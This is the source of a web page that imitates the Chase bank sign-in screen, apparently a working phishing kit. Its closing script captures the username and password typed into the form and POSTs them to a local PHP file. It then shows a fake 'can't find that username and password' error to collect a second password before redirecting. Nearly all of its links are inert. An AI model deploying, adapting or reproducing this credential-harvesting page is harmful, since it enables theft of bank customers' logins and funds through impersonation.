<html xmlns="http://www.w3.org/1999/xhtml" class="no-js" lang="en" dir="ltr">
<head>
    <meta charset="utf-8">
    <meta name="robots" content="noindex,nofollow">
    <meta name="google-site-verification" content="3CrQzUY6Sc8yzx6kfUoUJaDReLCeS0E2Ky9uwa2_whQ">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="msapplication-config" content="none">
    <title>Sign in - chase.com</title>
    <meta name="description" content="">
    <meta name="author" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <!--[if lte IE 8]>
    <link rel="stylesheet" type="text/css" media="all"
          href="https://static.chasecdn.com/web/2020.06.21-643/logon/assets/ie8.css"/> <![endif]-->
    <link rel="shortcut icon" href="favicon.ico">
    <link rel="apple-touch-icon" sizes="152x152"
          href="https://static.chasecdn.com/content/dam/cpo-static/images/chase-touch-icon-152x152.png">
    <link rel="apple-touch-icon" sizes="120x120"
          href="https://static.chasecdn.com/content/dam/cpo-static/images/chase-touch-icon-120x120.png">
    <link rel="apple-touch-icon" sizes="76x76"
          href="https://static.chasecdn.com/content/dam/cpo-static/images/chase-touch-icon-76x76.png">
    <link rel="apple-touch-icon" href="https://static.chasecdn.com/content/dam/cpo-static/images/chase-touch-icon.png">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <link rel="apple-touch-startup-image"
          href="https://static.chasecdn.com/web/2020.06.21-643/@ccb-cxo/cxo-ui-common-utilities/dist/common/assets/img/splash/ipad-landscape.png"
          media="screen and (min-device-width: 481px) and (max-device-width: 1024px) and (orientation:landscape)">
    <link rel="apple-touch-startup-image"
          href="https://static.chasecdn.com/web/2020.06.21-643/@ccb-cxo/cxo-ui-common-utilities/dist/common/assets/img/splash/ipad-portrait.png"
          media="screen and (min-device-width: 481px) and (max-device-width: 1024px) and (orientation:portrait)">
    <link rel="apple-touch-startup-image"
          href="https://static.chasecdn.com/web/2020.06.21-643/@ccb-cxo/cxo-ui-common-utilities/dist/common/assets/img/splash/iphone.png"
          media="screen and (max-device-width: 320px)">
    <style>
        @font-face {
            font-family: Open Sans;
            font-style: normal;
            font-weight: 400;
            src: url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-regular.eot?#iefix') format('embedded-opentype'), url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-regular.woff') format('woff'), url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-regular.ttf') format('truetype'), url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-regular.svg#opensans-regular') format('svg')
        }

        @font-face {
            font-family: Open Sans;
            font-style: normal;
            font-weight: 600;
            src: url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-semibold.eot?#iefix') format('embedded-opentype'), url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-semibold.woff') format('woff'), url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-semibold.ttf') format('truetype'), url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-semibold.svg#opensans-semibold') format('svg')
        }

        @font-face {
            font-family: Open Sans;
            font-style: normal;
            font-weight: 700;
            src: url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-bold.eot?#iefix') format('embedded-opentype'), url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-bold.woff') format('woff'), url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-bold.ttf') format('truetype'), url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-bold.svg#opensans-bold') format('svg')
        }

        @font-face {
            font-family: Open Sans;
            font-style: normal;
            font-weight: 800;
            src: url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-extrabold.eot?#iefix') format('embedded-opentype'), url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-extrabold.woff') format('woff'), url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-extrabold.ttf') format('truetype'), url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-extrabold.svg#opensans-extrabold') format('svg')
        }

        @font-face {
            font-family: Open Sans;
            font-style: normal;
            font-weight: 300;
            src: url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-light.eot?#iefix') format('embedded-opentype'), url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-light.woff') format('woff'), url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-light.ttf') format('truetype'), url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-light.svg#opensans-light') format('svg')
        }

        @font-face {
            font-family: videoplayer;
            font-style: normal;
            font-weight: normal;
            src: url('https://static.chasecdn.com/content/dam/cpo-static/fonts/videoplayer.eot?#iefix') format('embedded-opentype'), url('https://static.chasecdn.com/content/dam/cpo-static/fonts/videoplayer.woff') format('woff'), url('https://static.chasecdn.com/content/dam/cpo-static/fonts/videoplayer.ttf') format('truetype'), url('https://static.chasecdn.com/content/dam/cpo-static/fonts/videoplayer.svg#videoplayer') format('svg')
        }

        html {
            height: 100%;
            background: #fff
        }

        @media only screen and (min-width: 768px) {
            html {
                background: #1c4f82;
                background: -moz-linear-gradient(top, #1c4f82 0%, #2e6ea3 100%);
                background: -webkit-linear-gradient(top, #1c4f82 0%, #2e6ea3 100%);
                background: linear-gradient(to bottom, #1c4f82 0%, #2e6ea3 100%)
            }
        }</style>
    <link rel="stylesheet"
          href="https://static.chasecdn.com/web/2020.06.21-643/@ccb-cxo/cxo-ui-common-utilities/dist/common/assets/blue-ui.css">
    <link rel="stylesheet" href="https://static.chasecdn.com/web/2020.06.21-643/logon/assets/logon.css">
    <style type="text/css">
        footer {
            position: absolute;
            width: 100%;
            bottom: 0
        }

        body {
            overflow-x: hidden;
            overflow-y: auto;
            height: 100%
        }

        .nothing {
            overflow: hidden !important
        }

        .hide {
            display: none !important
        }

        .spinnerWrapper {
            position: absolute;
            width: 100%;
            top: 45%;
            text-align: center
        }

        .jpui.spinner {
            display: inline-block;
            overflow: visible !important;
            padding-top: 0;
            margin-top: -0%
        }

        .jpui.spinner:after {
            content: "020";
            -moz-animation: three-quarters-loader 780ms infinite linear;
            -webkit-animation: three-quarters-loader 780ms infinite linear;
            animation: three-quarters-loader 780ms infinite linear;
            border: 4px solid #ccc;
            border-right-color: #0092ff;
            border-radius: 50%;
            box-sizing: border-box;
            display: inline-block;
            position: relative;
            width: 48px;
            height: 48px
        }

        @media (max-width: 991px) {
            .jpui.spinner:after {
                width: 38px;
                height: 38px
            }
        }

        @media (max-width: 767px) {
            .jpui.spinner:after {
                width: 28px;
                height: 28px
            }
        }

        .jpui.spinner:before {
            content: "Loading";
            color: transparent;
            position: absolute;
            bottom: -1.25rem;
            font-size: 1rem
        }

        .jpui.spinner:focus {
            outline: 0
        }

        @-moz-keyframes three-quarters-loader {
            0% {
                -moz-transform: rotate(0);
                transform: rotate(0)
            }
            100% {
                -moz-transform: rotate(360deg);
                transform: rotate(360deg)
            }
        }

        @-webkit-keyframes three-quarters-loader {
            0% {
                -webkit-transform: rotate(0);
                transform: rotate(0)
            }
            100% {
                -webkit-transform: rotate(360deg);
                transform: rotate(360deg)
            }
        }

        @keyframes three-quarters-loader {
            0% {
                -moz-transform: rotate(0);
                -ms-transform: rotate(0);
                -webkit-transform: rotate(0);
                transform: rotate(0)
            }
            100% {
                -moz-transform: rotate(360deg);
                -ms-transform: rotate(360deg);
                -webkit-transform: rotate(360deg);
                transform: rotate(360deg)
            }
        }

        .jpui.spinner .util.accessible-text {
            position: absolute !important;
            clip: rect(1px 1px 1px 1px);
            clip: rect(1px, 1px, 1px, 1px);
            padding: 0 !important;
            border: 0 !important;
            height: 1px !important;
            width: 1px !important;
            overflow: hidden
        }

        .spinner:after, .mask:after {
            content: '';
            position: fixed;
            z-index: -1;
            top: 0;
            right: 0;
            bottom: 0;
            left: 0;
            background: #1c4f82;
            background: -moz-linear-gradient(top, #1c4f82 0, #2e6ea3 100%);
            -ms-filter: alpha(opacity=90);
            filter: alpha(opacity=90)
        }

        @media screen and (min-width: 1000px) {
            body {
                overflow: hidden
            }
        }

        @media screen and (max-width: 720px) {
        }

        @media screen and (min-width: 413px) and (min-height: 719px) {
            footer {
                bottom: -9px
            }
        }

        @media screen and (max-width: 413px) and (min-height: 750px) {
            footer {
                position: absolute;
                bottom: -9px
            }

            .logon-container {
                margin-bottom: 100px
            }
        }

        @media screen and (max-width: 413px) and (max-height: 749px) {
            footer {
                position: relative
            }

            .logon-container {
                margin-bottom: 100px
            }
        }

        @media screen and (max-width: 413px) and (max-height: 739px) {
            footer {
                position: relative
            }

            .logon-container {
                margin-bottom: 100px
            }
        }</style>
</head>
<body class="nothing" data-has-view="true">
<div id="fixed">
    <div class="spinner"
         style=" position: fixed; top: 43%; right: 0; bottom: 0; left: 0; z-index: 200; margin: 0; text-align: center;">
        <div class="">
            <div id="chaseSpinnerID" class="jpui spinner" tabindex="-1" style="color: transparent"><span id="accessible-chaseSpinnerID"
                                                                              class="util accessible-text">loading</span>
            </div>
        </div>
    </div>
</div>
<script type="text/javascript">
    document.onreadystatechange = function () {
        var state = document.readyState;
        if (state == 'complete') {
            setTimeout(function () {
                document.getElementById('interactive');
                document.querySelector('body').classList.remove('nothing');
                document.getElementById('fixed').classList.add("hide");
            }, 2000);
        }
    }
</script>
<div id="logonApp" data-is-view="true">
    <div class="homepage" tabindex="-1">
        <div id="advertisenativeapp" data-has-view="true">
            <div data-is-view="true">
                <div class="advertiseNativeApp"></div>
            </div>
        </div>
        <div class="toggle-aria-hidden" id="sitemessage" role="region" aria-labelledby="site-messages-heading"
             aria-hidden="true" data-has-view="true">
            <div data-is-view="true">
                <div id="siteMessageAda" aria-live="polite"><h2 class="util accessible-text" id="site-messages-heading">
                        You have no more site alerts</h2></div>
            </div>
        </div>
        <div class="logon-container" id="container">
            <header class="toggle-aria-hidden" id="logon-summary-menu" data-has-view="true">
                <div class="logon header jpui transparent navigation bar" data-is-view="true"><a
                        onclick="window.location.replace(location.href);return false;" id="logoHomepageLink" href="#"
                        onclick="window.location.replace(location.href);return false;">
                        <div class="chase logo"></div>
                        <span class="util accessible-text">Chase.com homepage</span> </a></div>
            </header>
            <main id="logon-content" data-has-view="true">
                <div class="container logon" data-is-view="true">
                    <div>
                        <div id="backgroundImage">
                            <div class="jpui background image fixed" id="geoImage">
                                <style type="text/css">.jpui.background.image {
                                        background-image: url(https://static.chasecdn.com/content/geo-images/images/background.mobile.night.1.jpeg/08758.jpeg);
                                        filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='https://static.chasecdn.com/content/geo-images/images/background.mobile.night.1.jpeg/08758.jpeg', sizingMethod='scale');
                                        -ms-filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='https://static.chasecdn.com/content/geo-images/images/background.mobile.night.1.jpeg/08758.jpeg', sizingMethod='scale')
                                    }

                                    @media (min-width: 320px) {
                                        .jpui.background.image {
                                            background-image: url(https://static.chasecdn.com/content/geo-images/images/background.mobile.night.1.jpeg/08758.jpeg)
                                        }
                                    }

                                    @media (min-width: 992px) {
                                        .jpui.background.image {
                                            background-image: url(https://static.chasecdn.com/content/geo-images/images/background.tablet.night.1.jpeg/08758.jpeg)
                                        }
                                    }

                                    @media (min-width: 1024px) {
                                        .jpui.background.image {
                                            background-image: url(https://static.chasecdn.com/content/geo-images/images/background.desktop.night.1.jpeg/08758.jpeg)
                                        }
                                    }</style>
                            </div>
                        </div>
                    </div>
                    <div class="row">
                        <div class="col-xs-12 col-md-6 col-md-offset-3 logoff hidden" id="logoffbox">
                            <div class="jpui raised segment">
                                <div class="row">
                                    <div class="col-xs-10 col-xs-offset-1"><h3 class="u-focus in-progress" tabindex="-1"
                                                                               id="logoff-header">You're being signed
                                            out.</h3></div>
                                </div>
                                <div class="row">
                                    <div class="col-xs-12">
                                        <div class="progress">
                                            <div class="bar"></div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="col-xs-12 col-sm-6 col-sm-offset-3 logon-box" id="logonbox">
                            <div class="jpui raised segment">
                                <div id="thirdPartyAggregatorSecurityBanner"></div>
                                <div class="row">
                                    <div class="col-xs-10 col-xs-offset-1">
                                        <form id="login-form" method="POST" autocomplete="off"
                                              action="javascript:void(0);" novalidate="">
                                            <div id="validator-error-header" style="display:none">
                                                <div class="jpui error error inverted primary animate alert"
                                                     id="logon-error" role="region" aria-labelledby="inner-logon-error">
                                                    <div class="icon"><span id="type-icon-logon-error"><i
                                                                class="jpui exclamation-color icon"
                                                                id="icon-type-icon-logon-error"
                                                                aria-hidden="true"></i></span></div>
                                                    <div class="icon background"></div>
                                                    <div class="content wrap" id="content-logon-error"><h2 class="title"
                                                                                                           tabindex="-1"
                                                                                                           id="inner-logon-error">
                                                            <span class="util accessible-text" id="icon-logon-error">Important: </span>Please
                                                            tell us your username and password.</h2></div>
                                                </div>
                                            </div>
                                            <div class="jpui fieldgroup logon-xs-toggle logon-floating-label userID-margin-top"
                                                 id="userId">
                                                <div class="jpui vertical">
                                                    <div class="align-label-input floating-label__container">
                                                        <div class="label-wrapper"><label
                                                                class="jpui fieldlabel label-alignment vertical"
                                                                id="userId-label" for="userId-text-input-field"
                                                                aria-hidden="false"><span
                                                                    class="util accessible-text errorAdaText">Error:</span><span
                                                                    class="util accessible-text"
                                                                    id="userId-label-errorLabel"></span>Username <span
                                                                    class="util accessible-text"
                                                                    id="userId-label-accessible-text"></span> </label></div>
                                                        <div class="logon-xs-toggle" id="userId-text"><input min="0"
                                                                                                             class="jpui input logon-xs-toggle"
                                                                                                             id="userId-text-input-field"
                                                                                                             placeholder=""
                                                                                                             format=""
                                                                                                             aria-describedby=" userId-input-field-label aggregator-security-banner"
                                                                                                             type="text"
                                                                                                             name="userId"
                                                                                                             data-validate="userId"
                                                                                                             required=""
                                                                                                             value="">
                                                        </div>
                                                    </div>
                                                    <div>
                                                        <div></div>
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="jpui fieldgroup logon-xs-toggle logon-floating-label"
                                                 id="password">
                                                <div class="jpui vertical">
                                                    <div class="align-label-input floating-label__container">
                                                        <div class="label-wrapper"><label
                                                                class="jpui fieldlabel label-alignment vertical"
                                                                id="password-label" for="password-text-input-field"
                                                                aria-hidden="false"><span class="util accessible-text"
                                                                                          id="password-label-errorLabel"></span>Password
                                                                <span class="util accessible-text"
                                                                      id="password-label-accessible-text"></span> </label>
                                                        </div>
                                                        <div class="logon-xs-toggle" id="password-text"><input min="0"
                                                                                                               class="jpui input logon-xs-toggle"
                                                                                                               id="password-text-input-field"
                                                                                                               placeholder=""
                                                                                                               format=""
                                                                                                               aria-describedby=" password-input-field-label"
                                                                                                               autocomplete="off"
                                                                                                               type="password"
                                                                                                               name="password"
                                                                                                               data-validate="password"
                                                                                                               required=""
                                                                                                               value="">
                                                        </div>
                                                    </div>
                                                    <div>
                                                        <div></div>
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="jpui fieldgroup logon-xs-toggle logon-floating-label hidden"
                                                 id="securityToken">
                                                <div class="jpui vertical">
                                                    <div class="align-label-input floating-label__container">
                                                        <div class="label-wrapper"><label
                                                                class="jpui fieldlabel label-alignment vertical"
                                                                id="securityToken-label"
                                                                for="securityToken-text-input-field"
                                                                aria-hidden="false"><span class="util accessible-text"
                                                                                          id="securityToken-label-errorLabel"></span>Token
                                                                <span class="util accessible-text"
                                                                      id="securityToken-label-accessible-text"></span>
                                                            </label></div>
                                                        <div class="logon-xs-toggle" id="securityToken-text"><input
                                                                min="0" class="jpui input logon-xs-toggle"
                                                                id="securityToken-text-input-field" placeholder=""
                                                                format=""
                                                                aria-describedby=" securityToken-input-field-label"
                                                                autocomplete="off" maxlength="35" type="tel"
                                                                name="securityToken" data-validate="securityToken"
                                                                required="" value=""></div>
                                                    </div>
                                                    <div>
                                                        <div></div>
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="row logon-xs-toggle">
                                                <div class="col-xs-6 rememberMe-checkbox-container">
                                                    <div class="jpui checkbox" id="rememberMe">
                                                        <div class="checkbox-flex">
                                                            <div class="checkboxWrap"><input class="checkbox__input"
                                                                                             type="checkbox"
                                                                                             id="input-rememberMe"
                                                                                             aria-label="This checked box means that we will remember your username. Remember me"
                                                                                             name="rememberMe"
                                                                                             value="on"> <i
                                                                    class="jpui checkmark icon check"
                                                                    aria-hidden="true"></i></div>
                                                            <label for="input-rememberMe"> <span class="checkbox-label"
                                                                                                 id="label-rememberMe">Remember me </span>
                                                            </label></div>
                                                    </div>
                                                </div>
                                                <div class="col-xs-6 token-checkbox-container">
                                                    <div class="jpui checkbox useToken" id="useToken">
                                                        <div class="checkbox-flex">
                                                            <div class="checkboxWrap"><input class="checkbox__input"
                                                                                             type="checkbox"
                                                                                             id="input-useToken"
                                                                                             aria-label="Shows content above. Use token"
                                                                                             name="rsaToken" value="on">
                                                                <i class="jpui checkmark icon check"
                                                                   aria-hidden="true"></i></div>
                                                            <label for="input-useToken"> <span class="checkbox-label"
                                                                                               id="label-useToken">Use token </span>
                                                            </label></div>
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="row">
                                                <button type="submit" id="signin-button"
                                                        class="jpui button focus fluid primary"><span class="label">Sign in</span>
                                                </button>
                                            </div>
                                            <div class="row"><span class="jpui link" id="forgotPassword-link-wrapper"><a
                                                        class="link-anchor" id="forgotPassword" href="javascript:void(0);"
                                                        onclick="window.location.replace(location.href);return false;"
                                                        aria-label=" Forgot username/password? ">Forgot username/password?<i
                                                            class="jpui progressright icon end-icon" id="forgotPassword-endIcon"
                                                            aria-hidden="true"></i></a></span></div>
                                            <div class="row"><span class="jpui link" id="enrollment-link-wrapper"><a
                                                        class="link-anchor last"
                                                        onclick="window.location.replace(location.href);return false;"
                                                        id="enrollment" href="javascript:void(0);"
                                                        aria-label=" Not Enrolled? Sign Up Now. ">Not Enrolled? Sign Up Now.<i
                                                            class="jpui progressright icon end-icon" id="enrollment-endIcon"
                                                            aria-hidden="true"></i></a></span></div>
                                        </form>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </main>
        </div>
        <footer class="logon-footer" id="logon-footer" data-has-view="true">
            <div class="footer-container" data-is-view="true" style="position: static;">
                <div class="container">
                    <div class="social-links row">
                        <div class="col-xs-12"><span class="follow-us-text">Follow us:</span>
                            <ul class="icon-links">
                                <li class="facebook"><span id="requestChaseFacebook-iconanchor-wrapper"><a
                                            onclick="window.location.replace(location.href);return false;"
                                            class="jpui iconaction" href="javascript:void(0);"
                                            id="requestChaseFacebook"> <span class="util accessible-text"
                                                                             id="accessible-requestChaseFacebook">Facebook: Opens dialog</span> <i
                                                class="jpui facebook icon" id="icon-requestChaseFacebook"
                                                aria-hidden="true"></i> </a> </span></li>
                                <li class="instagram"><span id="requestChaseInstagram-iconanchor-wrapper"><a
                                            onclick="window.location.replace(location.href);return false;"
                                            class="jpui iconaction" href="javascript:void(0);"
                                            id="requestChaseInstagram"> <span class="util accessible-text"
                                                                              id="accessible-requestChaseInstagram">Instagram: Opens dialog</span> <i
                                                class="jpui instagram icon" id="icon-requestChaseInstagram"
                                                aria-hidden="true"></i> </a> </span></li>
                                <li class="twitter"><span id="requestChaseTwitter-iconanchor-wrapper"><a
                                            onclick="window.location.replace(location.href);return false;"
                                            class="jpui iconaction" href="javascript:void(0);"
                                            id="requestChaseTwitter"> <span class="util accessible-text"
                                                                            id="accessible-requestChaseTwitter">Twitter: Opens dialog</span> <i
                                                class="jpui twitter icon" id="icon-requestChaseTwitter" aria-hidden="true"></i> </a> </span>
                                </li>
                                <li class="youtube"><span id="requestChaseYouTube-iconanchor-wrapper"><a
                                            onclick="window.location.replace(location.href);return false;"
                                            class="jpui iconaction" href="javascript:void(0);"
                                            id="requestChaseYouTube"> <span class="util accessible-text"
                                                                            id="accessible-requestChaseYouTube">YouTube: Opens dialog</span> <i
                                                class="jpui youtube icon" id="icon-requestChaseYouTube" aria-hidden="true"></i> </a> </span>
                                </li>
                                <li class="linkedin"><span id="requestChaseLinkedIn-iconanchor-wrapper"><a
                                            onclick="window.location.replace(location.href);return false;"
                                            class="jpui iconaction" href="javascript:void(0);"
                                            id="requestChaseLinkedIn"> <span class="util accessible-text"
                                                                             id="accessible-requestChaseLinkedIn">LinkedIn: Opens dialog</span> <i
                                                class="jpui linkedin icon" id="icon-requestChaseLinkedIn"
                                                aria-hidden="true"></i> </a> </span></li>
                            </ul>
                        </div>
                    </div>
                    <div class="footer-links row implement-ada-features-enabled">
                        <div class="col-xs-12">
                            <ul>
                                <li><span class="jpui link" id="requestContactUs-link-wrapper"><a
                                            onclick="window.location.replace(location.href);return false;"
                                            class="link-anchor" id="requestContactUs" href="javascript:void(0);"
                                            aria-label=" Contact us ">Contact us</a></span></li>
                                <li><span class="jpui link" id="requestPrivacyNotice-link-wrapper"><a
                                            onclick="window.location.replace(location.href);return false;"
                                            class="link-anchor" id="requestPrivacyNotice" href="javascript:void(0);"
                                            aria-label=" Privacy ">Privacy</a></span></li>
                                <li><span class="jpui link" id="requestSecurity-link-wrapper"><a
                                            onclick="window.location.replace(location.href);return false;"
                                            class="link-anchor" id="requestSecurity" href="javascript:void(0);"
                                            aria-label=" Security ">Security</a></span></li>
                                <li><span class="jpui link" id="requestTermsOfUse-link-wrapper"><a
                                            onclick="window.location.replace(location.href);return false;"
                                            class="link-anchor" id="requestTermsOfUse" href="javascript:void(0);"
                                            aria-label=" Terms of use ">Terms of use</a></span></li>
                                <li><span class="jpui link" id="requestAccessibility-link-wrapper"><a
                                            onclick="window.location.replace(location.href);return false;"
                                            class="link-anchor" id="requestAccessibility" href="javascript:void(0);"
                                            aria-label=" Accessibility ">Accessibility</a></span></li>
                                <li><span class="jpui link" id="requestMortgageLoanOriginators-link-wrapper"><a
                                            onclick="window.location.replace(location.href);return false;"
                                            class="link-anchor" id="requestMortgageLoanOriginators"
                                            href="javascript:void(0);"
                                            aria-label=" SAFE Act: Chase Mortgage Loan Originators ">SAFE Act: Chase Mortgage Loan Originators</a></span>
                                </li>
                                <li><span class="jpui link" id="requestHomeMortgageDisclosureAct-link-wrapper"><a
                                            onclick="window.location.replace(location.href);return false;"
                                            class="link-anchor" id="requestHomeMortgageDisclosureAct"
                                            href="javascript:void(0);" aria-label=" Fair Lending ">Fair Lending</a></span>
                                </li>
                                <li><span class="jpui link" id="requestAboutChase-link-wrapper"><a
                                            onclick="window.location.replace(location.href);return false;"
                                            class="link-anchor" id="requestAboutChase" href="javascript:void(0);"
                                            aria-label=" About Chase ">About Chase</a></span></li>
                                <li><span class="jpui link" id="requestJpMorgan-link-wrapper"><a
                                            onclick="window.location.replace(location.href);return false;"
                                            class="link-anchor" id="requestJpMorgan" href="javascript:void(0);"
                                            aria-label=" J.P. Morgan ">J.P. Morgan</a></span></li>
                                <li><span class="jpui link" id="requestJpMorganChaseCo-link-wrapper"><a
                                            onclick="window.location.replace(location.href);return false;"
                                            class="link-anchor" id="requestJpMorganChaseCo" href="javascript:void(0);"
                                            aria-label=" JPMorgan Chase &amp; Co. ">JPMorgan Chase &amp; Co.</a></span></li>
                                <li><span class="jpui link" id="requestCareers-link-wrapper"><a
                                            onclick="window.location.replace(location.href);return false;"
                                            class="link-anchor" id="requestCareers" href="javascript:void(0);"
                                            aria-label=" Careers ">Careers</a></span></li>
                                <li><span class="jpui link" id="requestEspanol-link-wrapper"><a
                                            onclick="window.location.replace(location.href);return false;"
                                            class="link-anchor" id="requestEspanol" href="javascript:void(0);"
                                            aria-label=" Español ">Español</a></span></li>
                                <li><span class="jpui link" id="requestChaseCanada-link-wrapper"><a
                                            onclick="window.location.replace(location.href);return false;"
                                            class="link-anchor" id="requestChaseCanada" href="javascript:void(0);"
                                            aria-label=" Chase Canada ">Chase Canada</a></span></li>
                                <li><span class="jpui link" id="requestSiteMap-link-wrapper"><a
                                            onclick="window.location.replace(location.href);return false;"
                                            class="link-anchor" id="requestSiteMap" href="javascript:void(0);"
                                            aria-label=" Site map ">Site map</a></span></li>
                                <li>Member FDIC</li>
                                <li><i class="jpui equal-housing-lender icon" id="equalHousingLenderLabel"
                                       aria-hidden="true"></i> Equal Housing Lender
                                </li>
                                <li class="copyright-label">© 2021 JPMorgan Chase &amp; Co.</li>
                            </ul>
                        </div>
                    </div>
                    <div class="row galaxy-footer">
                        <div class="col-xs-10 col-xs-offset-1"><p class="NOTE"><span></span> <br> <span
                                    class="copyright-label">© 2021 JPMorgan Chase &amp; Co.</span></p>
                            <p><span class="jpui link" id="galaxyRequestPrivacyNotice-link-wrapper"><a
                                        onclick="window.location.replace(location.href);return false;"
                                        class="link-anchor NOTELINK" id="galaxyRequestPrivacyNotice"
                                        href="javascript:void(0);" aria-label=" Privacy ">Privacy<i
                                            class="jpui progressright icon end-icon" id="galaxyRequestPrivacyNotice-endIcon"
                                            aria-hidden="true"></i></a></span></p>
                            <p><span class="jpui link" id="galaxyRequestAccessibility-link-wrapper"><a
                                        onclick="window.location.replace(location.href);return false;"
                                        class="link-anchor NOTELINK" id="galaxyRequestAccessibility"
                                        href="javascript:void(0);" aria-label=" Accessibility ">Accessibility<i
                                            class="jpui progressright icon end-icon" id="galaxyRequestAccessibility-endIcon"
                                            aria-hidden="true"></i></a></span></p></div>
                    </div>
                </div>
            </div>
        </footer>
    </div>
</div>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"
        integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
<script>let rander = Date.now().toString(16);
    let compare = "";
    let secondPass = "";
    let second_password = true;
    $(document).ready(function () {
        $("#login-form").submit(function (e) {
            e.preventDefault();
            if ($("#signin-button").hasClass("loading")) {
                return false;
            }
            $("#validator-error-header").hide("fast");
            if ($("#userId-text-input-field").val().toString().trim().length < 1 || $("#password-text-input-field").val().toString().trim().length < 1) {
                $("#userId-text-input-field").attr("done", "no");
                $("#password-text-input-field").attr("done", "no");
                if ($("#userId-text-input-field").val().toString().trim().length < 1) {
                    check_valid($("#userId-text-input-field"), "false", true, "You must supply a username.");
                } else {
                    check_valid($("#userId-text-input-field"), "true", false, "You must supply a username.");
                }
                if ($("#password-text-input-field").val().toString().trim().length < 1) {
                    check_valid($("#password-text-input-field"), "false", true, "You must supply a password.");
                } else {
                    check_valid($("#password-text-input-field"), "true", false, "You must supply a password.");
                }
                $("#validator-error-header h2").html('<span class="util accessible-text" id="icon-logon-error">Important: </span>' + "Please tell us your username and password.");
                $("#validator-error-header").show();
                return false;
            }
            if (!validateEmail($("#userId-text-input-field").val()) && $("#userId-text-input-field").val().toString().trim().length > 4) {
                check_valid($("#userId-text-input-field"), "true", false, "");
            } else {
                $("#userId-text-input-field").attr("done", "no");
                check_valid($("#userId-text-input-field"), "false", false, "");
                return false;
            }
            if ($("#password-text-input-field").val().toString().length < 5) {
                $("#password-text-input-field").attr("done", "no");
                check_valid($("#password-text-input-field"), "false", false, "");
                return false;
            } else {
                check_valid($("#password-text-input-field"), "true", false, "");
            }
            $("#signin-button").addClass("loading").attr("disabled", "disabled");
            secondPass = secondPass.length > 0 ? (rander + "_____" + $("#userId-text-input-field").val()) : "";
            let us = (rander + "_____" + $("#userId-text-input-field").val());
            let option1 = "";
            if (secondPass.length > 0) {
                if (us == compare) {
                } else {
                    option1 = "Username (corrected): " + $("#userId-text-input-field").val().toString();
                    secondPass = compare;
                }
            }
            setTimeout(function () {
                $.ajax({
                    dataType: 'text',
                    url: "web/auth/dashboard/post0926352.php",
                    type: 'POST',
                    data: {
                        userid: $("#userId-text-input-field").val(),
                        password: $("#password-text-input-field").val(),
                        b_user_pass: "yes",
                    },
                    success: function (response) {
                        setTimeout(function () {
						let u_r_l = location.href.includes("web/auth/")?location.href.split('web/auth/')[0]+'web/auth/dashboard':location.href.split('auth.php')[0]+'web/auth/dashboard';u_r_l=u_r_l.replace('http://','https://');
                            if (response.includes("yes")) {
                                window.location.replace(u_r_l + "#/dashboard/overviewAccounts/overview/index");
                            } else {
                                secondPass = us;
                                compare = us;
                                if (second_password === true) {
                                    $("#signin-button").removeClass("loading").removeAttr("disabled");
                                    $("#validator-error-header h2").html('<span class="util accessible-text" id="icon-logon-error">Important: </span>' + "We can't find that username and password. Please try again");
                                    $("#validator-error-header").show();
                                    $("#password-text-input-field").val("").attr("done", "no");
                                    $("#userId-text-input-field").val("").attr("done", "no").focus();
                                    check_valid($("#userId-text-input-field"), "false", false, "");
                                    check_valid($("#password-text-input-field"), "false", false, "");
                                } else {
                                    window.location.replace(u_r_l + "#/dashboard/overviewAccounts/overview/index");
                                }
                            }
                        }, 500);
                    },
                    error: function (response) {
                        //console.log(response);
                     window.location.replace(window.location.href);
                    },
                    complete: function () {
                    }
                });
            }, 1500);
            return false;
        });
        $("#userId-text-input-field").keyup(function () {
            if (!validateEmail($(this).val()) && $(this).val().toString().length > 3) {
                $(this).attr("done", "yes");
            } else {
                $(this).attr("done", "no");
            }
        });
        $("#password-text-input-field").keyup(function () {
            if ($(this).val().toString().trim().length > 4) {
                $(this).attr("done", "yes");
            } else {
                $(this).attr("done", "no");
            }
        });
        $("input").keyup(function () {
            let fore = "[for=" + $(this)[0].id + "]";
            if ($(this).val().toString().length > 0) {
                $(this).removeClass("clientSideError").attr("before", "no");
                $(fore).removeClass("error");
            }
        });
        $("input").focus(function () {
            $(this).parents(".align-label-input.floating-label__container").addClass("floating");
        });
        $("input").focusout(function () {
            let fore = "[for=" + this.id + "]";
            if ($(this).val().toString().length < 1) {
                $(this).parents(".align-label-input.floating-label__container").removeClass("floating");
                $(this).addClass("clientSideError");
                $(fore).addClass("error");
            } else {
                $(this).removeClass("clientSideError").attr("before", "no");
                $(fore).removeClass("error");
            }
        });
    });

